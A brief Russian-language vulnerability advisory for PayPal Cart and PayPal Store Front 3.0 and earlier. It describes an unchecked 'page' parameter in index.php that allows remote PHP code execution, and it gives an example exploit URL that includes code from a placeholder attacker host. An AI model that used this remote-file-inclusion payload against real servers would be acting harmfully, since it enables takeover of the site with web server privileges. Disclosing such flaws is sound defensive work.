Программа: PayPal Cart, PayPal Store Front 3.0 и более ранние версии
Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере.
Программное обеспечение не проверяет параметр "page" в сценарии "index.php". В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера.
Пример/Эксплоит:
http://www.vulnsite.com/index.php?do= ext&page=http://www.attacker.com/index
Где http://www.attacker.com/index.php
